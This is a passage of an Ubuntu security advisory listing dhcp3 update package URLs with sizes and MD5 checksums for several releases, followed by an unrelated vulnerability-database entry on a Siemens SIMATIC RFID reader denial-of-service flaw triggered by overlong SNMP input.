http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client_3.0.6.dfsg-1ubuntu9.2_i386.deb Size/MD5: 221966 92748d084525779ad31fe09ae76ca8d5 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-common_3.0.6.dfsg-1ubuntu9.2_i386.deb Size/MD5: 281564 0e64a350c9599b473f42949dbaa44533 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-dev_3.0.6.dfsg-1ubuntu9.2_i386.deb Size/MD5: 109818 5ef8d14534865cdf0b63699e54ab684a http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-server_3.0.6.dfsg-1ubuntu9.2_i386.deb Size/MD5: 318748 205746468ea8d58f1babe96c28f46983 http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-relay_3.0.6.dfsg-1ubuntu9.2_i386.deb Size/MD5: 103376 15e19ab3867304e29f59f3e97170f145 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client-udeb_3.0.6.dfsg-1ubuntu9.2_lpia.udeb Size/MD5: 158248 1ce010480a0ea9a1a8683995ab5c9b68 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client_3.0.6.dfsg-1ubuntu9.2_lpia.deb Size/MD5: 220236 d0c1551dde51da5503fe3be6288a23bb http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-common_3.0.6.dfsg-1ubuntu9.2_lpia.deb Size/MD5: 279790 cf35fa8aaca649fd85366e684628a580 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-dev_3.0.6.dfsg-1ubuntu9.2_lpia.deb Size/MD5: 109062 d1ff75192f05906028ac9001483529da http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-server_3.0.6.dfsg-1ubuntu9.2_lpia.deb Size/MD5: 316576 6f95deb3879a7c38c0f9cd1ba1ff0228 http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-relay_3.0.6.dfsg-1ubuntu9.2_lpia.deb Size/MD5: 102310 d4b1c32f8c1d1a6383fc09580e46ec79 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client-udeb_3.0.6.dfsg-1ubuntu9.2_powerpc.udeb Size/MD5: 177278 29a10d5d08bc3797b67770a4028758ff http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client_3.0.6.dfsg-1ubuntu9.2_powerpc.deb Size/MD5: 242046 27324a8f5623a94ff813148a5267fb4b http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-common_3.0.6.dfsg-1ubuntu9.2_powerpc.deb Size/MD5: 296498 4b8af066dc6c2481e4ff360800c04e74 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-dev_3.0.6.dfsg-1ubuntu9.2_powerpc.deb Size/MD5: 122548 9ad8db4fbd23f1760d1bc123b01f014b http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-server_3.0.6.dfsg-1ubuntu9.2_powerpc.deb Size/MD5: 341860 28075deaecbdc1d77166dcb1623a8c85 http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-relay_3.0.6.dfsg-1ubuntu9.2_powerpc.deb Size/MD5: 112934 766413326d6486146da4aec03a2654bc sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client-udeb_3.0.6.dfsg-1ubuntu9.2_sparc.udeb Size/MD5: 156574 742d54969d6dd68e7ac86ca00e1b1832 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client_3.0.6.dfsg-1ubuntu9.2_sparc.deb Size/MD5: 218754 60013fe472200e1bf45d9b02d80a244e http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-common_3.0.6.dfsg-1ubuntu9.2_sparc.deb Size/MD5: 277066 bf1034124c51ddacf732c2887957a46e http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-dev_3.0.6.dfsg-1ubuntu9.2_sparc.deb Size/MD5: 113494 b50639e27d92c0ababba9fab23242d7d http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-server_3.0.6.dfsg-1ubuntu9.2_sparc.deb Size/MD5: 313426 b93d5ec9d7ea9717a79d6bf2bb80a285 http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-relay_3.0.6.dfsg-1ubuntu9.2_sparc.deb Size/MD5: 102930 df99654fbd9e6f5aba7f962adb9d6470 Updated packages for Ubuntu 9.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3_3.1.2-1ubuntu7.2.diff.gz Size/MD5: 141611 0cab5bee752928f3c9f0c8e1ded26167 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3_3.1.2-1ubuntu7.2.dsc Size/MD5: 1955 a26905456538cd0d30e924e488302fc4 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3_3.1.2.orig.tar.gz Size/MD5: 799626 85901a9554650030df7d1ef3e5959fdf Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp-client_3.1.2-1ubuntu7.2_all.deb Size/MD5: 26206 905e286082551fcbc23916052de7e2fa amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client-udeb_3.1.2-1ubuntu7.2_amd64.udeb Size/MD5: 208604 5bb8643607d5f416205174f97d443e8e http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client_3.1.2-1ubuntu7.2_amd64.deb Size/MD5: 270930 fa0267775f2471f0be30499bf121b6e7 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-common_3.1.2-1ubuntu7.2_amd64.deb Size/MD5: 332152 ee101e67b7ad97bd410e983da115484d http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-dev_3.1.2-1ubuntu7.2_amd64.deb Size/MD5: 127130 0d4b4a1dc992d56f8c01d94990290910 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-server_3.1.2-1ubuntu7.2_amd64.deb Size/MD5: 395062 a5ab658903283a97dd658e5cdfe6a45e http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-relay_3.1.2-1ubuntu7.2_amd64.deb Size/MD5: 125444 6f12bfb86b46567aa8e2ecba8af1852e http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-server-ldap_3.1.2-1ubuntu7.2_amd64.deb Size/MD5: 348242 8fe33e4a7afac6d5a952d0c158d7ed45 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client-udeb_3.1.2-1ubuntu7.2_i386.udeb Size/MD5: 191210 64285abd7e68c517eefcf3ff5eecb909 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client_3.1.2-1ubuntu7.2_i386.deb Size/MD5: 252916 749769cec2a5d0cdfe5ddb67e6864270 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-common_3.1.2-1ubuntu7.2_i386.deb Size/MD5: 315850 e0deb4932a763831adc3e73cf0f068fa http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-dev_3.1.2-1ubuntu7.2_i386.deb Size/MD5: 116650 434d9e26a1b3b5a4b5fd94bea2c581b4 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-server_3.1.2-1ubuntu7.2_i386.deb Size/MD5: 372288 481d9d80e948895969b72be4b825fbb8 http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-relay_3.1.2-1ubuntu7.2_i386.deb Size/MD5: 116424 49010850bef64719353588c5d88e6714 http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-server-ldap_3.1.2-1ubuntu7.2_i386.deb Size/MD5: 326174 7f328cba4c811d5d56582328f1ad6b1d armel architecture (ARM Architecture): http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client-udeb_3.1.2-1ubuntu7.2_armel.udeb Size/MD5: 174400 4ed674aa3f13c4c4012def78b6cfd62f http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client_3.1.2-1ubuntu7.2_armel.deb Size/MD5: 236228 c14a8f75dc70e363afb2e39b9b6c9b68 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-common_3.1.2-1ubuntu7.2_armel.deb Size/MD5: 300026 8183f7371713d8ddc8bd2b8f8d979794 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-dev_3.1.2-1ubuntu7.2_armel.deb Size/MD5: 112806 41dcceea5abd7feac4f1f7465b3892b7 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-server_3.1.2-1ubuntu7.2_armel.deb Size/MD5: 349366 ea2f47d49b065c252caeb33d9d273363 http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-relay_3.1.2-1ubuntu7.2_armel.deb Size/MD5: 108672 f277fadf0e50c5325b20f8001f30108a http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-server-ldap_3.1.2-1ubuntu7.2_armel.deb Size/MD5: 301210 76887fde4612e80131c94a00b328a874 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client-udeb_3.1.2-1ubuntu7.2_lpia.udeb Size/MD5: 187330 e70af0ba0633b7a10c666f2f2e30b017 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client_3.1.2-1ubuntu7.2_lpia.deb Size/MD5: 249154 bde848f0444ac204f0781d848771b2e7 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-common_3.1.2-1ubuntu7.2_lpia.deb Size/MD5: 312056 e131e50d9159fb5a7cf92bd7532c6d5b http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-dev_3.1.2-1ubuntu7.2_lpia.deb Size/MD5: 115610 6bf9bc6ccc3986f7bda77f6e0929bd2b http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-server_3.1.2-1ubuntu7.2_lpia.deb Size/MD5: 368276 a5d4ce07f31b702817fb3d3961fd8a7b http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-relay_3.1.2-1ubuntu7.2_lpia.deb Size/MD5: 114588 d030b6a51bf6eb1b682c88fcfc92cdda http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-server-ldap_3.1.2-1ubuntu7.2_lpia.deb Size/MD5: 321710 5c51aac0b4ea78167072cce854d63f47 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client-udeb_3.1.2-1ubuntu7.2_powerpc.udeb Size/MD5: 199998 aff548b71963695089f418a502bc5e01 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client_3.1.2-1ubuntu7.2_powerpc.deb Size/MD5: 262344 a4799a7b4c6d6d91120ef36537485080 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-common_3.1.2-1ubuntu7.2_powerpc.deb Size/MD5: 324014 c6be94d8dda2d47ea08c3f1277160eda http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-dev_3.1.2-1ubuntu7.2_powerpc.deb Size/MD5: 120394 4b35e8aa5a363a659daa6232a0a76501 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-server_3.1.2-1ubuntu7.2_powerpc.deb Size/MD5: 382434 9c71333d4f8ccc12d14996fa42ba60b7 http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-relay_3.1.2-1ubuntu7.2_powerpc.deb Size/MD5: 120310 32c5affaeb955349a26cae2bd9c92236 http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-server-ldap_3.1.2-1ubuntu7.2_powerpc.deb Size/MD5: 335902 5460f8f32a30489940cf69855983ed3c sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client-udeb_3.1.2-1ubuntu7.2_sparc.udeb Size/MD5: 203458 038c030a32c3d74e3d20cb4f8eaf5336 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client_3.1.2-1ubuntu7.2_sparc.deb Size/MD5: 265862 67e06c4f7f5352a3248060245f41837c http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-common_3.1.2-1ubuntu7.2_sparc.deb Size/MD5: 324634 873eeaf81f86f69e1de8f2c9c2335fda http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-dev_3.1.2-1ubuntu7.2_sparc.deb Size/MD5: 116874 4583b6c0cd5cf6abf8fc81ae1c5656a2 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-server_3.1.2-1ubuntu7.2_sparc.deb Size/MD5: 387388 d31379a7fe21d36761ce6d6e01d51ba7 http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-relay_3.1.2-1ubuntu7.2_sparc.deb Size/MD5: 121616 62ed8721ad7cfe9f45448c321be12340 http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-server-ldap_3.1.2-1ubuntu7.2_sparc.deb Size/MD5: 341160 9e72b31fccc6ca7d33fcf814f7cca8be Updated packages for Ubuntu 10.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3_3.1.3-2ubuntu3.1.diff.gz Size/MD5: 145049 762c8d99c1e8e1245830ff0cfc9c22cf http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3_3.1.3-2ubuntu3.1.dsc Size/MD5: 1950 6fc0ed0a5f2f2897b25cb127fdf599bb http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3_3.1.3.orig.tar.gz Size/MD5: 804097 6ee8af8b283c95b3b4db5e88b6dd9a26 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp-client_3.1.3-2ubuntu3.1_all.deb Size/MD5: 27294 5873371bf57e765fd69a49ab238f7f5f amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client-udeb_3.1.3-2ubuntu3.1_amd64.udeb Size/MD5: 208924 47388e6df5a8a88758f893f0157f7a49 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client_3.1.3-2ubuntu3.1_amd64.deb Size/MD5: 273438 3e968127e7212b682e23422ccd498a51 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-common_3.1.3-2ubuntu3.1_amd64.deb Size/MD5: 335524 c2231ce6ce81fa1a61f33b50879ea8e7 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-dev_3.1.3-2ubuntu3.1_amd64.deb Size/MD5: 127748 31baa39d20b53e7200b146bb5e1dbc7a http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-server_3.1.3-2ubuntu3.1_amd64.deb Size/MD5: 396594 05f2652d1223dbbf59bcfdb86503ec81 http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-relay_3.1.3-2ubuntu3.1_amd64.deb Size/MD5: 126830 2017ee773f9e4c4136e6604003978a72 http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-server-ldap_3.1.3-2ubuntu3.1_amd64.deb Size/MD5: 349758 3a07e9f0c5b36e05024e98f2e01e7a36 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client-udeb_3.1.3-2ubuntu3.1_i386.udeb Size/MD5: 191468 7efe2e4b59392afda8ef1c8d69aa04cd http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client_3.1.3-2ubuntu3.1_i386.deb Size/MD5: 256600 1b24883c7ee056fcbcda20cc1d82673e http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-common_3.1.3-2ubuntu3.1_i386.deb Size/MD5: 318512 8ad3080333f5d86ad40548de9cfced43 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-dev_3.1.3-2ubuntu3.1_i386.deb Size/MD5: 118816 c679db32ae992ca9f6fc5473e81df94a http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-server_3.1.3-2ubuntu3.1_i386.deb Size/MD5: 376744 e3b708777fcd15c84240e43bf08b5d7e http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-relay_3.1.3-2ubuntu3.1_i386.deb Size/MD5: 117698 b0dfb728d6d9f69c9af3910744b1fbb8 http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-server-ldap_3.1.3-2ubuntu3.1_i386.deb Size/MD5: 328168 617edc965494055443d2c43326c411d7 armel architecture (ARM Architecture): http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client-udeb_3.1.3-2ubuntu3.1_armel.udeb Size/MD5: 180926 3969ae580d52c38b45d63ac388cbbe4d http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client_3.1.3-2ubuntu3.1_armel.deb Size/MD5: 246116 4956ee0ca5be72ee8ece1cd89ccf5082 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-common_3.1.3-2ubuntu3.1_armel.deb Size/MD5: 309348 c8567f86659a5670b6c7167a106bf71a http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-dev_3.1.3-2ubuntu3.1_armel.deb Size/MD5: 115350 023f49615f6ca0a8f2367e816921fa8d http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-server_3.1.3-2ubuntu3.1_armel.deb Size/MD5: 361242 b8e92e0d7ee35dccf62349627513b3d5 http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-relay_3.1.3-2ubuntu3.1_armel.deb Size/MD5: 113136 ecc1eca1107bf3d2a85145c87800f0a9 http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-server-ldap_3.1.3-2ubuntu3.1_armel.deb Size/MD5: 314078 a09784b9e5545593b771e8db596b70ad powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client-udeb_3.1.3-2ubuntu3.1_powerpc.udeb Size/MD5: 200432 0db5e288252f7cec9511aeedd6328a87 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client_3.1.3-2ubuntu3.1_powerpc.deb Size/MD5: 265410 78eb3d25b509d5d3669a33bf8603b0df http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-common_3.1.3-2ubuntu3.1_powerpc.deb Size/MD5: 327180 9d47f9f6bd35ebd5e53e68ff8cf27473 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-dev_3.1.3-2ubuntu3.1_powerpc.deb Size/MD5: 121552 7d955d50534795154e471aea30341fe1 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-server_3.1.3-2ubuntu3.1_powerpc.deb Size/MD5: 385370 dd7f5ffd85a725a8cb4f8fe6a067d0bb http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-relay_3.1.3-2ubuntu3.1_powerpc.deb Size/MD5: 121446 0ccdd1ca74fcd96be84596ce324f967e http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-server-ldap_3.1.3-2ubuntu3.1_powerpc.deb Size/MD5: 337410 54549752057dc73a3e35a158b871ea36 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client-udeb_3.1.3-2ubuntu3.1_sparc.udeb Size/MD5: 212712 be3c531c2fffd6ad83501e44015a3532 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client_3.1.3-2ubuntu3.1_sparc.deb Size/MD5: 277974 5a9ee5790cc705c845cd085c71d001b5 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-common_3.1.3-2ubuntu3.1_sparc.deb Size/MD5: 335174 22b404e90f206772c786f968392ecef1 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-dev_3.1.3-2ubuntu3.1_sparc.deb Size/MD5: 121764 97643d01dd5dd3eb06859cb881312e6d http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-server_3.1.3-2ubuntu3.1_sparc.deb Size/MD5: 402564 889e3a0882bebb5b4ceb4df3c805d883 http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-relay_3.1.3-2ubuntu3.1_sparc.deb Size/MD5: 126888 546ab5281e2ba4672471a30fce814e36 http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-server-ldap_3.1.3-2ubuntu3.1_sparc.deb Size/MD5: 353712 64fcbf89ca8fd7af9aa2a9bd66739170 Updated packages for Ubuntu 10.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3_3.1.3-2ubuntu6.1.diff.gz Size/MD5: 151417 604106743c8429a59b9b8af55de854f7 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3_3.1.3-2ubuntu6.1.dsc Size/MD5: 1962 792f947b2a6c3020c45ca1b56771c77e http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3_3.1.3.orig.tar.gz Size/MD5: 804097 6ee8af8b283c95b3b4db5e88b6dd9a26 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp-client_3.1.3-2ubuntu6.1_all.deb Size/MD5: 27778 319b0ce429e455b13a2248cc2cbe3491 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client-udeb_3.1.3-2ubuntu6.1_amd64.udeb Size/MD5: 208588 f4d4d2a63016b2b9960654be7c04b9c5 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client_3.1.3-2ubuntu6.1_amd64.deb Size/MD5: 274192 4005626ae7c8ed06bf15a1e014968ebd http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-common_3.1.3-2ubuntu6.1_amd64.deb Size/MD5: 335392 3f745248ea2b2c54e1771f1789cd13dc http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-dev_3.1.3-2ubuntu6.1_amd64.deb Size/MD5: 128922 dc2dd29ead86d887a22da63f27ae9692 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-server_3.1.3-2ubuntu6.1_amd64.deb Size/MD5: 398270 ffd780e99cb19cc3884703ec930a68cb http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-relay_3.1.3-2ubuntu6.1_amd64.deb Size/MD5: 126752 a4d3f03e0855ce6ef4cf6a75f33198d1 http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-server-ldap_3.1.3-2ubuntu6.1_amd64.deb Size/MD5: 349942 430e5e501488da92c3b4e2f2a685912a i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client-udeb_3.1.3-2ubuntu6.1_i386.udeb Size/MD5: 190312 23ced3137d0e056d9ce13dd41e656af3 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client_3.1.3-2ubuntu6.1_i386.deb Size/MD5: 255768 07cfc1c5db7b6d8585e9a00513699049 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-common_3.1.3-2ubuntu6.1_i386.deb Size/MD5: 317854 f9a58ae40c5f2645e17e2a9349f07edf http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-dev_3.1.3-2ubuntu6.1_i386.deb Size/MD5: 119094 9af94d26ecd3ce03c9d059ab8db5ff46 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-server_3.1.3-2ubuntu6.1_i386.deb Size/MD5: 376052 2dd5ab42f28d13baab1d332c92fcdbcf http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-relay_3.1.3-2ubuntu6.1_i386.deb Size/MD5: 117472 9638997daef5f353621a3adea0f054d5 http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-server-ldap_3.1.3-2ubuntu6.1_i386.deb Size/MD5: 327368 93d8a202391be7d55484901a7fa00f09 armel architecture (ARM Architecture): http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client-udeb_3.1.3-2ubuntu6.1_armel.udeb Size/MD5: 191162 ea1961dc40672d12302dcb3e0ae62c44 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client_3.1.3-2ubuntu6.1_armel.deb Size/MD5: 256344 fd6d84d8ca333a1e0cc0efc4c26df7cb http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-common_3.1.3-2ubuntu6.1_armel.deb Size/MD5: 319110 4ed5fb07ce8a4997c1132f96e4c29e39 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-dev_3.1.3-2ubuntu6.1_armel.deb Size/MD5: 118586 ade0a8cfa1217ae39ff58bea47e4faa0 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-server_3.1.3-2ubuntu6.1_armel.deb Size/MD5: 377976 7f26e7b4442f8b17b8178fc7b44e6720 http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-relay_3.1.3-2ubuntu6.1_armel.deb Size/MD5: 118802 ee96894319dbf620dbf981a2493cefa0 http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-server-ldap_3.1.3-2ubuntu6.1_armel.deb Size/MD5: 328204 3a65c3fb55385716b19bbb6fce72ab07 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client-udeb_3.1.3-2ubuntu6.1_powerpc.udeb Size/MD5: 199526 1a984e2503c1a015134cf94e273b768a http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client_3.1.3-2ubuntu6.1_powerpc.deb Size/MD5: 264952 7a2139af6f6681dae88cd826c04ce61e http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-common_3.1.3-2ubuntu6.1_powerpc.deb Size/MD5: 326646 8a1aaf899283814de8b8bcca6125576d http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-dev_3.1.3-2ubuntu6.1_powerpc.deb Size/MD5: 121952 90719742a1e133ae5edb9c5d6e72ad06 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-server_3.1.3-2ubuntu6.1_powerpc.deb Size/MD5: 384922 1cb9a8d40d9405b061b28cd2236d3acd http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-relay_3.1.3-2ubuntu6.1_powerpc.deb Size/MD5: 121542 81b420f37a81e5a05e5aadeaf1cb47c3 http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-server-ldap_3.1.3-2ubuntu6.1_powerpc.deb Size/MD5: 336918 26cba2f6096556526ce2a64556f571e5
var-202409-0241 A vulnerability has been identified in SIMATIC Reader RF610R CMIIT (6GT2811-6BC10-2AA0) (All versions < V4.2), SIMATIC Reader RF610R ETSI (6GT2811-6BC10-0AA0) (All versions < V4.2), SIMATIC Reader RF610R FCC (6GT2811-6BC10-1AA0) (All versions < V4.2), SIMATIC Reader RF615R CMIIT (6GT2811-6CC10-2AA0) (All versions < V4.2), SIMATIC Reader RF615R ETSI (6GT2811-6CC10-0AA0) (All versions < V4.2), SIMATIC Reader RF615R FCC (6GT2811-6CC10-1AA0) (All versions < V4.2), SIMATIC Reader RF650R ARIB (6GT2811-6AB20-4AA0) (All versions < V4.2), SIMATIC Reader RF650R CMIIT (6GT2811-6AB20-2AA0) (All versions < V4.2), SIMATIC Reader RF650R ETSI (6GT2811-6AB20-0AA0) (All versions < V4.2), SIMATIC Reader RF650R FCC (6GT2811-6AB20-1AA0) (All versions < V4.2), SIMATIC Reader RF680R ARIB (6GT2811-6AA10-4AA0) (All versions < V4.2), SIMATIC Reader RF680R CMIIT (6GT2811-6AA10-2AA0) (All versions < V4.2), SIMATIC Reader RF680R ETSI (6GT2811-6AA10-0AA0) (All versions < V4.2), SIMATIC Reader RF680R FCC (6GT2811-6AA10-1AA0) (All versions < V4.2), SIMATIC Reader RF685R ARIB (6GT2811-6CA10-4AA0) (All versions < V4.2), SIMATIC Reader RF685R CMIIT (6GT2811-6CA10-2AA0) (All versions < V4.2), SIMATIC Reader RF685R ETSI (6GT2811-6CA10-0AA0) (All versions < V4.2), SIMATIC Reader RF685R FCC (6GT2811-6CA10-1AA0) (All versions < V4.2), SIMATIC RF1140R (6GT2831-6CB00) (All versions < V1.1), SIMATIC RF1170R (6GT2831-6BB00) (All versions < V1.1), SIMATIC RF166C (6GT2002-0EE20) (All versions < V2.2), SIMATIC RF185C (6GT2002-0JE10) (All versions < V2.2), SIMATIC RF186C (6GT2002-0JE20) (All versions < V2.2), SIMATIC RF186CI (6GT2002-0JE50) (All versions < V2.2), SIMATIC RF188C (6GT2002-0JE40) (All versions < V2.2), SIMATIC RF188CI (6GT2002-0JE60) (All versions < V2.2), SIMATIC RF360R (6GT2801-5BA30) (All versions < V2.2). The affected devices does not properly handle the error in case of exceeding characters while setting SNMP leading to the restart of the application. SIMATIC RF360R firmware, simatic rf1170r firmware, simatic rf1140r Multiple Siemens products such as firmware have unspecified vulnerabilities.Service operation interruption (DoS) It may be in a state. SIMATIC RF600 Readers are used for contactless identification of various objects, such as transport containers, pallets, production goods or generally for recording bulk goods. SIMATIC RF1100 is an RFID-based solution for simple and universal electronic authorization management. The SIMATIC RF360R reader expands the SIMATIC RFID300 RFID system with a compact reader with an integrated Industrial Ethernet interface. Siemens SIMATIC RFID Readers have a mishandling vulnerability that can be exploited by an attacker to cause the application to restart
